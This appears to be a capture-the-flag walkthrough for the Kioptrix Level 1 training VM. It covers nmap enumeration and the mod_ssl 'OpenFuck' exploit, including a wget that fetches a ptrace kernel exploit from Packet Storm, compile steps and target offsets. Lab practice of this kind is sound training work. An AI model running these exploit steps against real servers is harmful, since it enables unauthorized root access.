Kioptrix: Level 1 (#1) walkthrough
The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of…
The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more than one way to successfully complete the challenges.
https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Enumeration
- Get the IP of the Target Machine.
2. All time favourite — NMAP
sudo nmap -p- -T4 -A 192.168.103.142
We can see the following services:
— 22 ssh
— 80 http
— 111 rpcbind
— 139 netbios
— 443 https
It’s time to dig deeper. ;p
More Enumeration 🕵️♂️
- SSH
2. HTTP + HTTPS
I can see that it is using Apache 1.3.20 + mod_ssl 2.8.4 on RedHat Linux.
3. RPCBIND
A number of interesting Unix daemons (including NIS+, NFS, and CDE components) run as Remote Procedure Call (RPC) services using dynamically assigned high ports. To keep track of registered endpoints and present clients with accurate details of listening RPC services, a portmapper service listens on TCP and UDP port 111.
Searching Exploit
Let me decode the command — searchsploit apache 1.3.20 | grep remote | grep -v windows
I am saying getting only the apache 1.3.20 applicable exploits from searchsploit. Then filtering the “remote” (if you need to attack the machine remotely) and not inc. windows since we know it is linux.
Additionally, we know that we have mod_ssl module is already installed in the Apache server. Hence, we can guess that OpenFu🤫 exploit might work for us.
Exploiting
Here comes the most fun part…👨🎤
We can now compile the exploit code locally and try to run it.
- get the exploit file to my working directory and make changes👽.
- searchsploit -m 47080
- wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
- python -m SimpleHTTPServer
- go to OpenFuck.c file and edit the following lines similar to pic below:
2. Compile it
- Requirements: libssl-dev ( apt-get install libssl-dev )
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
3. Get the parameters for the executable.
- box = 192.168.103.142
- port = 443
- target = 0x6a or 0x6b
4. Execute
Let me try with 0x06b
Got into the system…🥳
“Supreme excellence consists of breaking the enemy’s resistance without fighting.”
― Sun Tzu, The Art of War